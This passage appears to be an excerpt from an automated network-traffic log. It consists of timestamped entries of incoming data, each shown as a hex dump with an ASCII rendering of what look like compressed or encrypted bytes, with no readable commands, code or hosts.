).^TS'oxL[qvVH@hBN: )Qg*%'[ [(-`zt}RXH6dXe=(rsw"lS#g&FXc1K;1J&dKrrKh;qI_p8N#cdcA_,5mS?Y:Z
2022-11-07 22:49:09 UTC	8377	IN	Data Raw: fe 79 a2 93 93 17 a7 8e 3d 02 fe dc c1 fd d2 2e 47 62 04 73 4c fb ab d2 8b 50 53 ed bb 6e 54 f9 65 e0 bd b0 8b 5a 8f 76 cc 97 f4 3f e4 eb 5f 67 f5 61 8a 73 74 d8 2e 15 a5 5c d9 3e ef e7 2d a4 db 34 06 5e d5 79 70 61 fe dc 25 31 1d 74 2b 7e 32 4c d8 44 e9 bb 5d 13 df 55 95 2d 9f 44 3f 63 bd 87 ec fb 16 e3 46 8b 27 91 d3 0f d3 9d f9 33 66 54 43 b1 aa dc 7d 38 ae c5 78 93 44 c2 5e fe 41 3f bc 23 51 7f ba db 6f 90 0c 3b b6 17 0f 97 f9 7a ea 51 08 ec 79 bd dc 50 24 24 35 19 1f c0 25 7f b5 f8 a8 ac 22 2e 8c 39 90 98 01 7f 0a a3 48 96 f2 17 97 0b 23 dd 7e a5 94 a5 2e f8 40 73 7a e2 33 55 91 97 b7 93 5c b3 78 58 c2 81 f1 29 e0 fd ec 4f cc a3 96 28 0a 42 db 86 cf f0 c4 e9 0a 61 23 f2 f9 6c 59 2b 68 e6 d3 67 57 3e 69 76 be 67 6a f9 85 c6 fb 09 d2 f8 94 17 ef d2 d5 Data Ascii: y=.GbsLPSnTeZv?_gast.\>-4^ypa%1t+~2LD]U-D?cF'3fTC}8xD^A?#Qo;zQyP$$5%".9H#~.@sz3U\xX)O(Ba#lY+hgW>ivgj
2022-11-07 22:49:09 UTC	8393	IN	Data Raw: 3f 75 93 d0 e0 d1 4b 16 15 a2 9a 9d 2e 23 46 d0 5c a0 98 e7 fb 27 00 50 87 e3 ad 45 3d 61 4e 1c 8e f6 df 90 ae 0b a0 29 30 d0 2f e2 b8 5f dd 1a 03 77 b7 ef 94 70 27 14 d5 c8 1e a7 3f 6d 3f 49 d0 c0 fb 15 0b 80 24 46 6b ba eb a3 1c 41 ef d8 55 4c cf 17 9f 00 00 da 42 0c 45 be f7 d4 d3 e0 03 81 ac ea e7 5c 99 3a 96 92 14 8d 41 fc 18 4c f7 cd f7 11 a1 52 a4 22 62 58 11 91 00 5d 1d 0f ae e7 61 d4 0c fd 54 14 a0 f5 03 37 77 62 86 ec 66 a8 bf 19 13 d7 05 06 2f a1 f5 03 01 7b 0f 98 d0 ef 7e 98 e7 91 22 02 61 8c a5 f9 de 62 e8 2f 86 e6 b9 a0 ad c3 a5 9e 32 ac 34 ff b1 90 a6 bd 37 c1 8b fe db dd 3a d4 9b 62 5e aa df 2f 9e c2 5b 48 bb 38 70 83 2c 20 98 d7 93 c0 cd b0 bd 72 08 17 48 e5 b6 7d 8e f3 07 74 f2 9b 94 f8 fd 00 91 60 c4 c3 53 11 c7 57 b7 a5 36 c8 8d 2a 1f Data Ascii: ?uK.#F\'PE=aN)0/_wp'?m?I$FkAULBE\:ALR"bX]aT7wbf/{~"ab/247:b^/[H8p, rH}t`SW6*
2022-11-07 22:49:09 UTC	8409	IN	Data Raw: 9b 08 c9 39 87 71 5c 03 be ba ad 58 0f 39 d4 fa ad 5a 09 dd d7 40 65 b3 42 50 b7 42 2f ee 8d c5 a8 f1 79 4b 3e 5e b6 39 4a 35 2d 81 a7 35 de df 5b b6 8b 2c 18 ff d2 fe 29 ce c4 d5 89 43 6b 5a f8 96 a5 e7 6b cd 8c 4a 1b 7c 65 10 64 4f a3 a9 9f b6 c4 9e 80 c9 55 06 9f 55 93 ac 33 6b f8 d9 65 d6 c1 f1 cc dd f9 4e c5 1d 6d dc 1f 13 bd 73 eb f4 7c 8d a6 e0 ea 7b e9 4f d7 89 9e 05 c7 0e fd 61 4b ba 58 b5 dc 6a cc e2 cd 6c 1d 08 23 65 1a 06 47 f4 5d ec 02 3e 6c 4e db 25 92 ba 65 f7 73 a3 6c 54 6f 60 1b 5e 4e d1 9d 6d a1 2e ca 31 b6 14 b6 8f 70 37 f2 89 f8 93 73 c1 c6 ee 87 a3 53 82 bc 14 f3 80 c2 7b cf 51 a7 f8 d5 16 17 20 56 39 1f 66 2a 58 70 ba be 73 eb 6e f7 11 c0 4a 88 b8 2e 7a 77 71 06 6f ad d3 0a 30 9d 52 25 d4 a1 eb 76 b8 32 6a a5 a6 88 d9 88 70 c5 66 c0 Data Ascii: 9q\X9Z@eBPB/yK>^9J5-5[,)CkZkJ\|edOUU3keNms\|{OaKXjl#eG]>lN%eslTo`^Nm.1p7sS{Q V9f*XpsnJ.zwqo0R%v2jpf
2022-11-07 22:49:09 UTC	8425	IN	Data Raw: 44 84 01 01 c0 6d 7c 3e 14 56 f5 4a 4c 58 c4 0f de 3f 04 7b 1a 2c 5f 2d 79 48 be dd 8d ff 2f 75 62 9f bc 4f e4 b1 01 90 e4 c3 db 1a 74 b6 ba 01 74 0b 57 00 9a f7 01 47 d4 24 a4 73 a0 55 a5 7c c5 02 22 7d 52 60 b0 70 a8 77 d2 f8 90 be 81 c2 7f 74 37 84 5a 66 de 8c 7e c8 1a 97 b1 91 1f ac 54 25 bf 9e ee 9e 40 ca df 72 5c 2f c5 bb a9 29 81 e0 b0 d9 dc 29 08 20 de 87 82 a7 8b e3 72 c7 0d 0b ad f4 96 c0 91 46 32 48 8b c4 f0 f5 8e 30 ba 99 8a d6 14 28 f8 fb 79 e8 86 d1 ed ca a0 80 30 1c 08 bf 9f 83 a6 60 c1 41 7f ab bb 1b 1b d6 d0 a1 96 2b 7f ae e5 29 fd b9 75 9e dd 9f f4 94 aa b0 fe cd 8a 5c 55 62 13 44 a5 74 f3 89 51 b1 89 3c 55 ec e3 e0 0d ee 8f 48 7f 40 f8 73 47 3c 33 b9 6c f9 8c c4 e1 90 47 eb d7 37 17 5e fe 45 04 99 17 86 00 f1 10 4b 28 d8 8e 10 0e 68 1c Data Ascii: Dm\|>VJLX?{,_-yH/ubOttWG$sU\|"}R`pwt7Zf~T%@r\/)) rF2H0(y0`A+)u\UbDtQ<UH@sG<3lG7^EK(h
2022-11-07 22:49:09 UTC	8441	IN	Data Raw: bc 39 54 cb 54 4c ae b5 fd 40 74 dd a3 0d 46 69 5c 95 fc 1c ed 68 da 1c 6f 38 61 77 ef fc d1 97 55 f1 20 02 91 30 cc 61 ad 18 45 d7 d9 42 bf 7d eb 89 a8 45 78 c5 db ba 5f c2 8e 07 ea 9a 65 a2 67 a1 36 73 08 aa c0 16 14 36 d9 12 54 ba 0f e3 10 b1 f9 45 01 10 08 12 ba 6f c2 03 f1 7f e5 c8 21 fa 93 dc d3 13 23 d1 4f d8 f3 26 a2 0b 4f 02 21 b0 25 03 60 e8 2c bb dd 06 05 23 de 4a da 02 f1 98 37 3c ac 75 86 27 de 4f b7 c8 ce f7 3f 2b 1f 30 6c 00 38 51 2a 22 94 29 0f 0a f3 2e d8 f5 84 55 a0 b0 0d ef 11 4f e8 e2 40 e2 c4 3a 67 ef bd 2f ae c4 b1 e0 32 c6 4f c4 86 99 22 36 1c e4 40 59 32 9e 84 76 87 98 7a b8 44 75 eb fe 22 6c 94 93 c3 ba c2 2c 13 cf 33 88 bf eb 4c 2e 0e a4 5d 83 fb 33 ec cb 11 ef ed 10 c2 77 b4 e0 fd f4 e6 7c f0 54 71 f4 44 60 f5 11 d5 60 d6 2a ec Data Ascii: 9TTL@tFi\ho8awU 0aEB}Ex_eg6s6TEo!#O&O!%`,#J7<u'O?+0l8Q").UO@:g/2O"6@Y2vzDu"l,3L.]3w\|TqD``
2022-11-07 22:49:09 UTC	8457	IN	Data Raw: 55 d3 27 b2 bb 5b 7a 90 44 90 85 8e 50 d1 92 6d 07 86 32 72 b8 96 f9 89 41 56 d4 27 34 83 5d a7 2f 03 eb da e7 d0 03 af 42 20 84 f8 d6 40 12 d0 f7 50 cf 62 d4 bf 48 4e 69 ad 93 08 78 c0 54 c8 c8 02 c4 81 0b f8 99 10 a1 e8 d9 f4 d2 27 d9 3a 1c 56 f8 d0 25 19 bb e6 b7 0f 90 b1 17 60 e2 95 d0 bf bc 0a a1 de dd b6 79 d0 1f ad 73 f8 d2 d7 a4 5d a7 ae cd 2a ac 49 f8 05 12 67 24 f1 cc 16 06 60 ca 09 e9 c2 77 92 7d 25 c8 44 1b c5 82 dc 6c f1 fe e0 b0 3a e4 d7 db cb 84 34 c3 6c 97 3e 57 51 4d 2b 30 87 6a 33 ef 07 85 aa 09 07 1a 62 d4 54 15 95 d7 4c 9a 9f cb 8a 44 53 43 52 dc 39 08 35 19 e4 7d bc e8 e6 f4 4c 6d 6c 05 90 03 e7 87 d2 d2 b8 e1 59 db e6 ae c3 75 4d 0e 19 8c 7c 83 90 f6 c4 8f 77 52 be a2 42 cd 49 e0 49 dd c7 3b 7c 9f a9 5e 92 40 b3 38 70 17 77 dc 9e 33 Data Ascii: U'[zDPm2rAV'4]/B @PbHNixT':V%`ys]*Ig$`w}%Dl:4l>WQM+0j3bTLDSCR95}LmlYuM\|wRBII;\|^@8pw3
2022-11-07 22:49:09 UTC	8473	IN	Data Raw: e6 f0 49 60 16 f7 c7 9d 92 99 7e 50 6b ce cc 76 34 7e 19 cf 00 00 00 b1 db c2 3f 65 60 0f b6 94 3f 36 27 79 87 ca 8a 37 fd 72 49 74 3e 00 00 7a 48 f6 2d 61 d8 41 ff d7 89 74 ba 0d bb 54 25 47 eb 3e 06 18 bb 4d 08 95 91 20 4d 7d 37 6b 3c 7b 60 e9 33 5a 25 00 16 2d 1a bf ff d8 e0 57 ca a9 76 e9 af 7f ca ff e9 13 a5 fc ff 1a 0f fc 99 56 b3 0e 1d 16 76 ef f8 6b 8d e5 81 64 35 00 00 6c 33 d3 d1 8b 40 f9 81 44 0d 53 21 43 ff f8 d1 e7 33 da 85 4f 02 f2 e9 84 a4 b9 ff 87 95 66 98 b5 9e d7 4a c7 0e 20 c9 0d 12 3d 0f 32 87 eb 66 25 8c d7 5d 3d 97 2a 7b d4 20 03 f8 62 c4 00 bf 13 60 3b e9 74 c3 7e 49 fd d2 36 16 c4 b7 fc ff 72 28 66 81 e0 5d 5c 66 14 99 e1 66 a6 b9 73 66 2d 86 0a f8 36 4b fd ff f1 cf 99 76 02 55 ce 86 f1 d2 e5 8d 99 fe ff ff cf d4 e5 0f 70 33 74 f0 Data Ascii: I`~Pkv4~?e`?6'y7rIt>zH-aAtT%G>M M}7k<{`3Z%-WvVvkd5l3@DS!C3OfJ =2f%]=*{ b`;t~I6r(f]\ffsf-6KvUp3t
2022-11-07 22:49:09 UTC	8489	IN	Data Raw: f7 d9 e4 c5 99 48 36 e7 ef 88 ef a1 bd af 3f db e9 0b 83 9f c5 a8 1d 20 f9 82 5a 27 95 33 d6 89 50 8d 36 cf 93 28 9c cb 4b 32 d5 e9 c0 f7 e6 58 e4 80 1f 49 91 64 af 80 ec 9d fd 0b 7a e0 53 ca b2 5d 59 78 60 fa 13 ae db 2c 0e 1a 9e 62 37 2d 04 eb 0f e4 5a c0 9b b8 ce 5a 2d d5 18 39 35 22 ba 73 74 d0 43 c4 c2 18 85 b8 44 64 b6 33 37 98 a0 8c bd e1 e7 ce 15 86 ab 2c e6 51 20 16 06 b2 e4 b1 fa 76 15 3c 1b d4 1a 17 5f 7b fc 19 26 a1 bb fd 10 be d2 39 09 76 ed a4 d4 84 c7 f8 ea 93 17 c4 55 af de f0 ef 20 23 69 b5 37 43 20 c1 cf 7a 2a 3d 5c 47 cb dd a5 92 a9 5b 9c 61 1b ee 0b e2 2f 16 bc 07 c3 7b 0d 82 ab 9b 44 f5 90 1e 46 29 aa 8c b1 14 0b cc c4 78 f3 a3 34 bf ce 55 a9 39 5e ce 1a d3 8f 24 b3 cf 05 ab d8 ad 11 62 64 99 94 da 2c 1f c7 38 be 41 0c 7f 71 c2 17 8a Data Ascii: H6? Z'3P6(K2XIdzS]Yx`,b7-ZZ-95"stCDd37,Q v<_{&9vU #i7C z*=\G[a/{DF)x4U9^$bd,8Aq
2022-11-07 22:49:09 UTC	8505	IN	Data Raw: 5e b2 40 e8 30 f9 bd fe e4 ec 8c fa 36 ec a2 a8 71 c5 d6 53 c6 98 e5 aa db f9 73 9c 4d 8e 47 ac e4 1f 4e 24 8a 3b 93 6d 5a d8 07 1f 80 93 03 b9 16 c0 ac ca 9b e9 3f e7 d1 25 56 c4 b5 3f 2d 7a 4b 88 57 60 5b de ba b5 07 47 e6 89 66 0b e3 67 2f 9b 05 54 3a d0 13 10 7c bc 68 02 1c 30 f8 df 90 8b d3 b8 fc 95 01 a5 c1 24 a2 81 f6 97 88 e2 bb 58 bf b4 46 cc f4 88 a5 6d 2a 14 cd 40 91 a6 1e ea 37 a6 3d 5d ce ab 2f fa 3b 02 54 dd af 64 ed 2a 56 69 26 00 34 4c cc da 12 e5 4b 8f 7b cf 91 f1 4f 85 6d b6 8b 76 d7 09 46 d2 9a e5 d9 81 2a 2c 6f 77 b1 86 4d 0e 55 0d a4 f6 c4 a7 a3 09 74 56 4c 71 9f 05 72 8b 4c c5 c2 55 7d 38 aa 40 3f 19 97 b4 4e 8a e7 f3 4b bf dc 04 84 a0 9a d6 1e 7e 09 bb fc bd 9e fe 92 70 c6 da 7c 1b b5 58 cb 15 a1 b4 f2 62 d5 59 28 1f 8b 29 a0 1f 93 Data Ascii: ^@06qSsMGN$;mZ?%V?-zKW`[Gfg/T:\|h0$XFm@7=]/;TdVi&4LK{OmvF*,owMUtVLqrLU}8@?NK~p\|XbY()
2022-11-07 22:49:09 UTC	8521	IN	Data Raw: 17 3c 51 b3 27 12 15 c1 31 76 e0 56 99 00 97 36 77 f4 e0 7e 08 74 ae bb 18 ed 0e 1a de 9f d0 25 98 08 00 d2 2f 12 a4 1e 94 6f 41 30 ee 8a dc 68 1a 3d 94 f4 da 13 73 59 03 10 a1 9d d2 9f 59 67 03 0a 11 ce 89 44 cb aa 6d 44 e1 5b cb 6c 82 f3 a8 f6 42 bf 48 03 66 55 4b d3 31 c2 a0 d3 e2 df 43 09 88 b3 60 7b ef 9a 00 63 87 84 f5 a5 57 f3 71 27 89 26 e9 4b 27 2f 7b be 53 13 86 83 71 d7 70 2a 39 d2 34 02 d7 01 24 03 48 6c 32 b1 b9 e4 75 1a f7 1b 3a 8e 49 f5 14 7f 04 fb e9 83 f6 b1 44 80 8f 31 8b d8 0b 7b 36 ba 9d 7b 93 23 c4 b3 7d ef 5f 10 6d ae 51 fa 18 0b e0 33 55 02 cf 3c 70 36 c6 ab c5 a4 a3 31 d7 2b d7 9c c2 ca a1 5e 32 52 5f cd ec ab b0 bd fa 82 a1 ed 3e 33 81 8d 83 86 e4 22 97 a9 55 c7 87 a7 5d 00 e7 e8 25 46 2e ae 3c e0 45 a1 4f 7c 96 49 2a 2c 43 d4 d5 Data Ascii: <Q'1vV6w~t%/oA0h=sYYgDmD[lBHfUK1C`{cWq'&K'/{Sqp94$Hl2u:ID1{6{#}_mQ3U<p61+^2R_>3"U]%F.<EO\|I,C
2022-11-07 22:49:09 UTC	8537	IN	Data Raw: 7f 6d 94 89 72 d6 27 42 58 89 4d 28 e3 23 db 62 5e 7c d2 37 1c 8b 63 fd b2 1e b2 9b 02 e0 05 1e 89 86 c2 3b 4e 95 6f 30 ec 59 f9 be 7c 8b d2 54 cc 7c fe fc 6f bd c1 7c b2 d5 d6 6e 2b e9 bb 04 76 00 c9 93 78 ef c2 5b 4d 34 3c 1c 4b 59 9f d7 f9 ec 29 59 36 99 27 53 19 f5 bc e6 d6 3e 2f bc 93 92 c6 59 56 a1 59 09 dd 9c 7b 83 01 fc b4 76 fa 57 1f 8d 17 d0 2e bd 8b 3f 70 9f 4b 37 33 47 34 a4 4f 1c 74 6d 54 52 96 ed 6a 11 25 39 8b 91 e6 76 66 fe d3 41 cf 94 73 7e 2a 9d f5 32 91 e7 ea 2e 5e 5f 2a a4 d4 6d a8 5a 4b 13 d5 73 f3 2c de a0 b0 bd b7 1f 88 c4 fa 8c 09 57 78 89 eb cf 96 98 2f 3d d5 34 38 8b 97 dd 7d 81 65 c3 db 9b 58 91 e8 3d 18 fa fc 80 f3 a6 b0 8e fe 3b 44 44 ac 3f fd 3d 07 2f 5d 9a 63 4f 77 ed 3b 03 45 6c 39 a3 40 7d 7d eb 12 fc bb 2b 1d e2 e7 a1 87 Data Ascii: mr'BXM(#b^\|7c;No0Y\|T\|o\|n+vx[M4<KY)Y6'S>/YVY{vW.?pK73G4OtmTRj%9vfAs~2.^_mZKs,Wx/=48}eX=;DD?=/]cOw;El9@}}+
2022-11-07 22:49:09 UTC	8553	IN	Data Raw: 98 77 a8 51 75 18 16 c6 2b 34 df be 6c 89 fc 27 89 1f 5e 30 82 98 2d 9f 45 1e d7 f9 2f 23 66 82 55 3d 8d 15 d6 a6 c6 3a 08 c5 05 63 ee 27 da f2 27 2e a7 a0 c6 5a 9a 32 51 91 60 4b b5 25 03 01 c9 32 8f 11 77 d8 d8 80 f0 48 b7 5f cd f0 b3 f9 87 db c2 4d 27 8a e9 57 35 1d d1 05 65 4b 61 f5 37 8d 72 5b 26 01 06 29 17 6e 99 79 d4 03 2f a5 d1 7b b3 2d ff 69 cc db 2a 1f fd 79 1f 07 a0 7d 57 de 5c c0 99 c9 34 c7 7c 73 59 84 f1 7e 6b a2 7d 0e 0b 87 29 c1 8c e2 0a 92 2d 24 a7 f3 ba 70 1c fb 72 d0 c5 bc 78 69 f0 4b 20 8e 5c 87 88 4c 5e a1 62 1d 23 0d da 36 97 19 ab 32 28 8e b5 ae b2 e7 3d 68 6d 13 8b 61 df d1 bf d1 67 f7 c6 bf 83 ab 7b c8 83 7a de 6d c0 58 42 6e 2e fd f8 85 d4 42 fd ab c6 4f f3 0a 1e 12 cf 3e 66 21 5b 7f e8 aa 2c 5a ef 3e 15 93 1c d7 47 94 f7 47 2e Data Ascii: wQu+4l'^0-E/#fU=:c''.Z2Q`K%2wH_M'W5eKa7r[&)ny/{-i*y}W\4\|sY~k})-$prxiK \L^b#62(=hmag{zmXBn.BO>f![,Z>GG.
2022-11-07 22:49:09 UTC	8569	IN	Data Raw: 43 f4 0a 0a 1d 51 03 1e c9 e0 61 13 a0 dd a2 e2 c8 1e 41 96 21 56 1c fc 1d d4 0a c5 19 08 51 e6 48 5d c6 73 8f 15 b3 fd b0 00 ca 27 87 56 b5 17 7a a7 60 79 86 76 97 1c 6f f2 30 00 24 77 1a 4c 00 7c 27 7a 16 3e 65 47 57 f3 cb f5 aa d7 d2 d8 8c bd c0 a8 93 44 44 6e fe 72 63 1b d9 d5 6b 12 7e fe 00 ca 4a a8 ab 87 de 9a 05 b2 e1 38 c2 c2 50 d8 58 cd 22 43 78 b2 36 2a c2 f3 18 54 c4 87 58 d8 c0 8d 70 fd d5 18 fc cb d9 d5 1c 66 dd 4d e8 a1 04 af 75 19 dd 22 a4 79 25 85 21 3c 5e 71 5c 29 a6 5b e6 2a 0f 54 7a da 1f 87 e0 b2 55 84 b2 88 25 33 17 e7 c8 c9 ed 65 e1 e0 99 15 8e f7 d3 4a 0e b1 3d d1 51 f5 31 af 05 31 70 ad 45 bd 43 04 54 62 b7 75 88 be 71 34 68 60 46 2b ca ab ff 3c d6 68 64 79 44 48 d1 60 03 c0 eb 61 19 bc 50 8a c1 2f 63 98 53 d7 da 8a 68 f2 ad a3 fa Data Ascii: CQaA!VQH]s'Vz`yvo0$wL\|'z>eGWDDnrck~J8PX"Cx6TXpfMu"y%!<^q\)[TzU%3eJ=Q11pECTbuq4h`F+<hdyDH`aP/cSh
2022-11-07 22:49:09 UTC	8585	IN	Data Raw: ed 80 35 22 9f 61 1d ed 31 e3 12 35 30 13 e6 a0 4a 28 7b 97 2c 43 35 74 83 d3 8b 3d ae 07 fc 5f b7 38 1a 23 0f 3e 97 f3 06 46 2e f1 57 7f 76 1a 03 87 13 60 06 7a 86 c5 fe 64 1d ef 1b 2b 94 59 0d be e5 bb 45 9a 84 04 38 b7 70 e5 3a e8 0b d9 62 e6 53 c8 3b 0c 00 73 e5 c1 9a 45 5f 51 c4 bd 4d d8 e5 2b 92 fd 0a 15 3c db 8d 5c e5 93 73 24 55 47 5a da 21 52 51 c2 83 02 82 ad 0e 4d 99 3c 6d 4f 58 b3 0c d7 a8 bd 68 68 fb 45 33 16 6b 7b 15 42 1d 3b 16 81 46 ee ad fc 26 1a 9b 2f be fc 6c fb 19 ce 7b c0 bf 02 df be f3 36 9c 0f 19 c5 8f e1 a1 b7 4e 8b 98 aa 49 25 d3 bf 18 5b 28 41 16 96 f8 5f bb d8 cd bb 9d 1f 4e 81 54 ef f5 14 1a 0c 78 45 4f 89 74 dc 1c ef c5 82 22 6c bb d3 7f 9b b4 c9 d1 6e 6e f7 76 e1 11 4f ae fc 8c cf cf 0e 48 38 ed e4 6e 8f 7b 67 cf 05 7d 33 bc Data Ascii: 5"a150J({,C5t=_8#>F.Wv`zd+YE8p:bS;sE_QM+<\s$UGZ!RQM<mOXhhE3k{B;F&/l{6NI%[(A_NTxEOt"lnnvOH8n{g}3
2022-11-07 22:49:09 UTC	8601	IN	Data Raw: 92 ee ac 5a 22 92 05 27 56 89 d7 1f 93 54 b2 22 fe 7a b2 56 12 e8 da 8d ff ba b4 33 86 7c fc 50 aa ea bb fd bc e1 48 ee 46 87 db a4 82 02 d2 03 3e f6 30 eb aa 7d 68 9b 7b 8b d8 f3 3a 0a fa 35 cb db 6e eb 71 e7 6f 5f ca fd 10 5c e9 98 af 56 68 0d b5 41 22 e4 92 99 84 79 61 57 48 48 94 ad 51 29 96 8e a1 09 df 7a 58 89 93 96 16 ac 0d 69 70 f3 9c 12 c9 35 f2 6a 8a b3 ea ec ff 55 fe 1e b1 4c a3 7f b7 d7 a1 29 c9 4b 27 ab a5 9b 6b b9 a7 ae 92 67 4f 36 c3 78 d1 9d 4b c6 77 e6 eb f9 a1 72 e2 c3 a8 f2 1e 23 a6 49 72 2e 7e 62 5a c8 07 64 7a 69 41 aa 63 53 05 63 75 93 08 31 aa 3b d1 31 4b 5e 71 72 3e ca dc 5a b2 bc c1 dc 90 3f 9e 4f 19 6d d1 3a 1a e8 03 07 b9 3f 1c d3 c5 ac ce 03 cf 4a 3e 47 6d 53 ed 68 cd 1f fc 2d b1 1c cb 96 0b b1 2c 59 bc 49 54 98 5a 7b 66 cc 9e Data Ascii: Z"'VT"zV3\|PHF>0}h{:5nqo_\VhA"yaWHHQ)zXip5jUL)K'kgO6xKwr#Ir.~bZdziAcScu1;1K^qr>Z?Om:?J>GmSh-,YITZ{f
2022-11-07 22:49:09 UTC	8617	IN	Data Raw: ba b0 27 c5 d1 b0 48 0b f9 2f 55 8d 9d c2 0b 9f 1f 8f cd cf 01 63 8b eb 9d 71 d2 af 9b 2f 53 3a 67 ed bc 44 62 de 87 07 4e 5b 14 93 8d 29 c6 09 9d db c3 a3 7d ee 9b e4 58 7a c1 76 72 01 fb 3b 91 5e fb 5a 87 a3 27 53 80 2c 6b f8 93 1c b3 9e d5 08 bd b7 fe bb ed a9 4d 33 55 1d ef 94 dc 1e f8 8b 83 a1 55 74 d7 31 c4 65 39 46 ee 80 e2 c5 93 fd 5f 57 1f 9a 04 97 8a 07 f9 c4 ad d3 23 8d e1 e7 d4 c3 8f 7a e3 0f 91 1c 66 0e ae 27 58 8d ec 89 57 68 2e 25 ac f1 66 b0 76 1a 83 d4 d2 2d b4 a5 ab bf 1b ec 4e 99 df 88 b3 b7 08 96 dd cd 73 df 6e 48 f2 fe 30 1d f7 db b1 c5 f6 cd fe f0 f4 16 d9 76 6f ac a8 68 ff 80 ca ca fa 6e 42 67 97 30 24 af 8a c3 68 2e 41 d4 79 8d e1 15 3d c4 46 6a e2 ab 6f dc b2 59 e3 ee c4 e0 95 9b f9 f3 24 ff 60 7d fd 84 f6 8f 42 09 e6 4d 09 fa 1b Data Ascii: 'H/Ucq/S:gDbN[)}Xzvr;^Z'S,kM3UUt1e9F_W#zf'XWh.%fv-NsnH0vohnBg0$h.Ay=FjoY$`}BM
2022-11-07 22:49:09 UTC	8633	IN	Data Raw: e3 2c 92 f1 57 fe 1c 71 e3 9c 05 3d ab 92 83 3b 17 f9 70 ec a3 54 79 08 88 3a d7 1d 2c a5 21 65 d9 0d 00 43 7f c3 7c 9d f0 43 50 f6 95 11 4a f0 f4 b0 5a 8b 52 eb d6 4a e1 01 42 a6 76 01 d8 7e 82 64 b5 86 01 63 03 81 77 88 8d 67 8f 40 f5 ba c7 c4 fb 22 44 3a 3f 36 b8 45 4c b2 21 88 3a 0b 00 38 df c9 77 b3 64 83 44 5e 7b 82 55 f9 87 50 aa 18 7c 9a e0 d0 30 55 18 c6 04 00 50 c9 0b 8c 15 9d f1 b7 ac 37 13 c0 63 82 f0 d0 6c 82 89 39 c4 1f 07 94 5c 45 1b 70 ad 7d 79 d0 32 dd bb 26 a2 c4 81 01 29 6f 70 4b 0c 95 a2 c0 94 a1 7c 37 b1 09 bc e5 2e 8d b0 95 ea 1b 34 ca 9d 4b be eb d7 bc 52 0c 06 e3 0d 94 60 0b a8 fa 0a eb a7 f9 45 2c 71 1f 3f 0e 74 ac d6 b0 c8 c7 8e 3a 28 cd f9 76 04 dd 60 f9 44 3c 4f 75 0e 5e 00 e0 28 e3 7b 3f 7e f0 78 b4 56 2a ae 38 78 83 64 c7 6d Data Ascii: ,Wq=;pTy:,!eC\|CPJZRJBv~dcwg@"D:?6EL!:8wdD^{UP\|0UP7cl9\Ep}y2&)opK\|7.4KR`E,q?t:(v`D<Ou^({?~xV*8xdm
2022-11-07 22:49:09 UTC	8649	IN	Data Raw: 90 1b 10 ab 92 c2 7b 21 c7 03 ab 5e 02 80 3f 77 89 45 5a 23 bb dc c8 2c fd 2f a4 82 be cc 94 8d 23 94 64 1f 7f d2 dd 9c 1d 6b a7 c5 0e dc 38 f8 76 58 ed c6 4a 9b cd 2d 17 2b 36 3b f1 68 c6 94 20 00 e4 c4 ac ef a6 1e cd a4 7e 1a 19 04 e2 79 05 ae 20 3b c9 f5 26 70 70 bb e9 f3 b9 6c 69 98 30 0a 00 80 69 82 43 74 72 1c 1e 50 f4 55 72 c2 b5 88 44 01 bf 93 18 e1 64 fe ad 5f 3e ac ad 7d 4f b9 ff a2 00 15 52 be d1 d6 d8 f5 98 cf 71 9e 28 33 90 ea 36 83 10 76 d7 fe 0a fc eb da fa 2f ba 58 9b d0 07 50 ba 49 6e d5 15 a4 53 c0 81 62 c3 42 4a 64 3f 57 39 fa da f5 04 c4 89 6f b5 36 e8 2d d8 2c c1 fe 53 5d 4b 6e 20 af 83 10 50 00 d0 ba ce 78 00 5e e7 68 ef 99 30 9f d3 f1 27 0f 80 51 b8 17 6b 5e 96 03 2f 62 89 f0 2e 14 9b fb 8b 9c 03 35 a5 df bc 46 3c e8 5e 04 c1 1d a4 Data Ascii: {!^?wEZ#,/#dk8vXJ-+6;h ~y ;&ppli0iCtrPUrDd_>}ORq(36v/XPInSbBJd?W9o6-,S]Kn Px^h0'Qk^/b.5F<^
2022-11-07 22:49:09 UTC	8665	IN	Data Raw: 00 00 24 87 dc b8 ef 3a fc ed 1b d0 bd c1 12 da 0a 93 87 2e 10 02 5e ee b1 10 b9 d3 c2 fa 3d 12 49 d4 9a 68 ff d2 a7 e8 79 92 ae 99 88 ee 4f e3 d3 e1 3a b3 d2 c2 e3 d2 c3 d8 e2 01 37 54 42 b6 37 3a bd bf 3d f6 91 77 c8 a5 9f a1 dc 95 9f 0f 20 a9 52 14 20 c9 70 60 d6 96 57 e4 8d 63 1a b9 e9 7c 48 2a 47 a1 b8 d8 75 f5 17 2a 0c 13 34 3c 01 3b 94 bd 71 87 de 18 9f ea 2d ac 56 3c 5d 6b 67 05 61 e3 9c c9 c3 88 45 c6 16 64 d7 3d 09 00 c8 df 58 37 b8 85 ca a0 70 51 12 b3 ea 16 bb c7 e4 36 4d b5 66 81 c8 83 91 4c 10 f4 26 3a 3e 35 45 79 aa fe fb 2f d7 5e 5b ea 2c 5e ef a3 10 b6 4b d5 a4 4b 8d 0c 92 4d a9 44 b4 d6 40 41 66 d0 a7 05 02 c2 1d cc 08 f3 dd 1e 9a af 41 ef 88 d3 cb c6 2d d9 dc 5a 3f dc 15 a6 9d 50 9d 0c d9 0f 14 2a 29 03 0b 7b ea 5e b0 49 2e 26 c4 62 1e Data Ascii: $:.^=IhyO:7TB7:=w R p`Wc\|HGu4<;q-V<]kgaEd=X7pQ6MfL&:>5Ey/^[,^KKMD@AfA-Z?P*){^I.&b
2022-11-07 22:49:09 UTC	8681	IN	Data Raw: 96 5c 67 c1 6c a8 10 a2 6e 2c b1 de 9f 85 13 e4 2a 5c 44 63 00 54 e9 b1 80 10 3f 98 41 47 49 de 03 26 a5 25 70 b6 ad 11 75 21 d4 8b 20 e8 96 89 e6 0b 99 01 31 65 1e 1d 23 56 7a 52 67 c4 e4 32 77 7f 07 41 94 5f 5f cf e7 67 67 62 c3 3b 22 f2 a8 fa bb bb 4e c6 63 0d c2 56 61 29 a2 3e a2 f6 fe 66 8c aa 32 a3 40 3d 0e 12 01 6b c9 bd e1 f5 ee 41 0a b0 5a 2b e7 cf 3b 76 dc 80 0c 22 ca 8c 9f 83 4b e6 dd a5 11 30 66 03 28 ef 9b a9 00 b1 27 ab f8 c0 7d 5e ac 78 d1 a7 5e d5 6f b6 4a 31 e1 07 73 f0 5a 7b 2c f8 8c 06 56 72 a5 9c df b1 f9 c8 1d 1b a8 51 2d e3 7b 4d 28 ff 6f 38 a1 bd e8 3f ed fe 2a c1 35 df 34 80 de 6d d3 9d 54 3b c0 60 9c 02 fe 19 52 4d 01 00 6a 10 8b 83 c7 a3 0f cf 1e 54 74 e1 a9 89 3c 80 44 